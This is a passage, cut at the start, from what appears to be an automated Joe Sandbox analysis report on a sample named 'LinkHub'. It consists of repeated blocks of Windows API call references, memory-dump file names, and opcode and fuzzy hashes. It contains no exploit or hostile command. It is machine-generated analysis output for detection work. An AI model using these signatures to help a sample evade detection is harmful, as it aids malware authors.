                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: 6f33dbe1abedf45192a11fe10caba1dab32ec8940e5bdb48a56215b555193418
                                                                                        • Instruction ID: 1f58d74b25631e48fd0af83f55584503918220aac06ae94d68e85cc967a46573
                                                                                        • Opcode Fuzzy Hash: 6f33dbe1abedf45192a11fe10caba1dab32ec8940e5bdb48a56215b555193418
                                                                                        • Instruction Fuzzy Hash: 4A01D8B26793327EAA24ABF8BCCAA766694EB15771730023AF110450F1EF554D225944
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,00232908,002C9B48,0000000C,00223268,00000001,?,?), ref: 002330EB
                                                                                        • _free.LIBCMT ref: 0023311E
                                                                                        • _free.LIBCMT ref: 00233146
                                                                                        • SetLastError.KERNEL32(00000000), ref: 00233153
                                                                                        • SetLastError.KERNEL32(00000000), ref: 0023315F
                                                                                        • _abort.LIBCMT ref: 00233165
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        • Opcode ID: 07669c2c379d911f57a7fa3614ba0bf694a395b2623cb5794f5e408e04d656ad
                                                                                        • Instruction ID: 0ea756a0c97d540be8aab1944b3daeb53890ad8a8afe4f3742e2deef8ed5ca7b
                                                                                        • Opcode Fuzzy Hash: 07669c2c379d911f57a7fa3614ba0bf694a395b2623cb5794f5e408e04d656ad
                                                                                        • Instruction Fuzzy Hash: 68F028F693060167C222BB34BC0AE5E126A9FC1771F250425FA2CD22E1EF60CF365961
                                                                                        APIs
                                                                                          • Part of subcall function 00201F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00201F87
                                                                                          • Part of subcall function 00201F2D: SelectObject.GDI32(?,00000000), ref: 00201F96
                                                                                          • Part of subcall function 00201F2D: BeginPath.GDI32(?), ref: 00201FAD
                                                                                          • Part of subcall function 00201F2D: SelectObject.GDI32(?,00000000), ref: 00201FD6
                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002994AA
                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 002994BE
                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002994CC
                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 002994DC
                                                                                        • EndPath.GDI32(?), ref: 002994EC
                                                                                        • StrokePath.GDI32(?), ref: 002994FC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                        • String ID:
                                                                                        • API String ID: 43455801-0
                                                                                        • Opcode ID: 64497b6c8957587028dc4fc59d2e823adc57f077e002fdb9259460958b3cc2c7
                                                                                        • Instruction ID: c244561749794c057513a4ef7834a809faeaae3622e569cb4f6a0622b5347aaa
                                                                                        • Opcode Fuzzy Hash: 64497b6c8957587028dc4fc59d2e823adc57f077e002fdb9259460958b3cc2c7
                                                                                        • Instruction Fuzzy Hash: 9E11DE7601010DBFDF129F94EC89FDA7F6DEB08364F048016FA1956161C7719D55DBA0
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00265B7C
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00265B8D
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00265B94
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00265B9C
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00265BB3
                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00265BC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: 5fed8a48c704373f3a9d3bbc5db42795caee6a8c2b6b6578d7a2edfc0ab0ef33
                                                                                        • Instruction ID: ef0736a1eb20400b593a53b6ba5f73ecedef10db75d67681d5870b8c098b6e6e
                                                                                        • Opcode Fuzzy Hash: 5fed8a48c704373f3a9d3bbc5db42795caee6a8c2b6b6578d7a2edfc0ab0ef33
                                                                                        • Instruction Fuzzy Hash: BA016275E00719BBEB109FA5AC49F4EBFB8EF48751F004066FA09A7280D6709C11DFA0
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002032AF
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 002032B7
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002032C2
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002032CD
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 002032D5
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 002032DD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: 154e2fcbec0be03bc17372de84af7a153971b7fe9f9534be08aafcdc4b06b986
                                                                                        • Instruction ID: 1f9fbb186c41a1f0cac3808ae7632a1b86db409d3e6ea27dd1d8702b0eaab6ad
                                                                                        • Opcode Fuzzy Hash: 154e2fcbec0be03bc17372de84af7a153971b7fe9f9534be08aafcdc4b06b986
                                                                                        • Instruction Fuzzy Hash: 140167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0026F447
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0026F45D
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0026F46C
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0026F47B
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0026F485
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0026F48C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: 703026a6ec4793a05c4a85df3c149d030d8451e7de0f80d4ae0e3dd82b23d0c6
                                                                                        • Instruction ID: d737abcdcf5293b324c783e04816ba3b51f3b1981b28239556d15b0352d1c08d
                                                                                        • Opcode Fuzzy Hash: 703026a6ec4793a05c4a85df3c149d030d8451e7de0f80d4ae0e3dd82b23d0c6
                                                                                        • Instruction Fuzzy Hash: A1F03036241158BBE7215B62BC0EEEF7B7CEFC6B11F00005AF60592090DBA05A41E6B5
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?), ref: 002434EF
                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00243506
                                                                                        • GetWindowDC.USER32(?), ref: 00243512
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00243521
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00243533
                                                                                        • GetSysColor.USER32(00000005), ref: 0024354D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                        • String ID:
                                                                                        • API String ID: 272304278-0
                                                                                        • Opcode ID: 95e4d6c45cd121aa5a7f691bd07f28268dfc0040a7e45fddf50327b31063001c
                                                                                        • Instruction ID: f246484ba505f9dd917344cfa99c8e506ea19db04416915fa6f8b0872743de4d
                                                                                        • Opcode Fuzzy Hash: 95e4d6c45cd121aa5a7f691bd07f28268dfc0040a7e45fddf50327b31063001c
                                                                                        • Instruction Fuzzy Hash: 7B016D32510205EFDB509FA4EC0CFE9BBB5FF18321F910162F91AA21A1CB311E51AF10
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002621CC
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 002621D8
                                                                                        • CloseHandle.KERNEL32(?), ref: 002621E1
                                                                                        • CloseHandle.KERNEL32(?), ref: 002621E9
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 002621F2
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002621F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: 4ce03c6299d6c0f232212dada5037ec76067e177ddb80d65cb2874803dcc0e93
                                                                                        • Instruction ID: 1afdedfde62f0b434feea4901b020b418f79b7d688bae88f4a10aee3eadab7ab
                                                                                        • Opcode Fuzzy Hash: 4ce03c6299d6c0f232212dada5037ec76067e177ddb80d65cb2874803dcc0e93
                                                                                        • Instruction Fuzzy Hash: FCE0E57B004105BBDB011FA1FD0D94ABF39FF49322B904222F22982074CB329420EF55
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 0028B903
                                                                                          • Part of subcall function 002041EA: _wcslen.LIBCMT ref: 002041EF
                                                                                        • GetProcessId.KERNEL32(00000000), ref: 0028B998
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028B9C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                        • String ID: <$@
                                                                                        • API String ID: 146682121-1426351568
                                                                                        • Opcode ID: ec0b7c55d2be385eb95c4a94b09cdb0d64137bcd3f35753db4560c32421b6026
                                                                                        • Instruction ID: 30c3d6fc713a519246c60d48bd97b160a2b86d1b17d3b0f611ce1ea0b0bf95fc
                                                                                        • Opcode Fuzzy Hash: ec0b7c55d2be385eb95c4a94b09cdb0d64137bcd3f35753db4560c32421b6026
                                                                                        • Instruction Fuzzy Hash: 59717778A20615DFCB11EF94C494A9EBBF4BF08300F048499E856AB392CB70ED65CF90
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00267B6D
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00267BA3
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00267BB4
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00267C36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        • Opcode ID: 462c562bed6b599fbf0d387d1af183a6a365a7045a84a2a1a098b4613433e31c
                                                                                        • Instruction ID: 2e5096c021badae1c0b8e2e0a8f57052684e99aa8a81d9d44f03cac008642721
                                                                                        • Opcode Fuzzy Hash: 462c562bed6b599fbf0d387d1af183a6a365a7045a84a2a1a098b4613433e31c
                                                                                        • Instruction Fuzzy Hash: 7641D471614205EFDB15CF24E884A9A7BB9EF44318F1080AEEC0ADF209D7B1DD94CBA0
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002948D1
                                                                                        • IsMenu.USER32(?), ref: 002948E6
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0029492E
                                                                                        • DrawMenuBar.USER32 ref: 00294941
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                        • String ID: 0
                                                                                        • API String ID: 3076010158-4108050209
                                                                                        • Opcode ID: f0f6a8ba022351872069c63a16b3c8829c7127cd5697c204e90617e7fe246aaa
                                                                                        • Instruction ID: ddd83404082b4ae3d354d834828c4be492a862cb8ca3eb9592096bbc6e5a4630
                                                                                        • Opcode Fuzzy Hash: f0f6a8ba022351872069c63a16b3c8829c7127cd5697c204e90617e7fe246aaa
                                                                                        • Instruction Fuzzy Hash: B5414A75A1120AEFEF10DF51E884EAABBB9FF06324F444129E94697250C730AD66CF60
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 002645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00264620
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002627B3
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002627C6
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 002627F6
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_wcslen$ClassName
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 2081771294-1403004172
                                                                                        • Opcode ID: fbd46924481c28fe4ca1e0d92d5cd9d1a22a4f4e0cf84f858c9fe24c5c7f4fb3
                                                                                        • Instruction ID: e76f05355194fa6cf2772598c08127f3b02d7dbb1920d84032e716c280db1677
                                                                                        • Opcode Fuzzy Hash: fbd46924481c28fe4ca1e0d92d5cd9d1a22a4f4e0cf84f858c9fe24c5c7f4fb3
                                                                                        • Instruction Fuzzy Hash: C7210771920104BFDB15ABA0DC8ADFFBB78DF453A0F504229F411A71E1CB745D699A60
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00293A29
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00293A30
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00293A45
                                                                                        • DestroyWindow.USER32(?), ref: 00293A4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 3529120543-1011021900
                                                                                        • Opcode ID: 4f4cee596bd39d532e8bc16fc33b5c58604323eef1d4303ae8000ffbc7dbc57b
                                                                                        • Instruction ID: 7aa32648775eff0d510ecd1cdfb25da74ccc79f88e1dc89a9f4ca589becb8ebd
                                                                                        • Opcode Fuzzy Hash: 4f4cee596bd39d532e8bc16fc33b5c58604323eef1d4303ae8000ffbc7dbc57b
                                                                                        • Instruction Fuzzy Hash: 0A21DE72620206ABEF10CF64EC84FBB77E9EB45364F105219FA91960D0C371DD60AB60
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • GetCursorPos.USER32(?), ref: 00299A5D
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00299A72
                                                                                        • GetCursorPos.USER32(?), ref: 00299ABA
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00299AF0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID: (-
                                                                                        • API String ID: 2864067406-4239615555
                                                                                        • Opcode ID: 66659f8e76ca73c5e85e21eff03274d4ccc63ce5c171d719a86a32d446653c01
                                                                                        • Instruction ID: 94906a0efc5cc87b4d6cd42bd81b97bddeeec61cbb8c48c247867d162b6b29d1
                                                                                        • Opcode Fuzzy Hash: 66659f8e76ca73c5e85e21eff03274d4ccc63ce5c171d719a86a32d446653c01
                                                                                        • Instruction Fuzzy Hash: 3921BF31610018EFCF258F98D858EEA7BB9EF09320F50406AF9058B1A1D7369DA0EB60
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00201AF4
                                                                                        • GetClientRect.USER32(?,?), ref: 002431F9
                                                                                        • GetCursorPos.USER32(?), ref: 00243203
                                                                                        • ScreenToClient.USER32(?,?), ref: 0024320E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID: (-
                                                                                        • API String ID: 4127811313-4239615555
                                                                                        • Opcode ID: 0f94b99e845bcbcb8be0744432cef6569db8a2ddb473954548e7e13de84dff5a
                                                                                        • Instruction ID: 8b016d9cbeca1401d4bd2475f98243ec13d70c295e57a249c5709dfacbfd415a
                                                                                        • Opcode Fuzzy Hash: 0f94b99e845bcbcb8be0744432cef6569db8a2ddb473954548e7e13de84dff5a
                                                                                        • Instruction Fuzzy Hash: F3115E32A2111AEBCF14DFA4D94A9EE77B8FB05344F100452F916E3181C7B1BAA1DBA1
                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0022508E,00000003,?,0022502E,00000003,002C98D8,0000000C,00225185,00000003,00000002), ref: 002250FD
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00225110
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0022508E,00000003,?,0022502E,00000003,002C98D8,0000000C,00225185,00000003,00000002,00000000), ref: 00225133
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
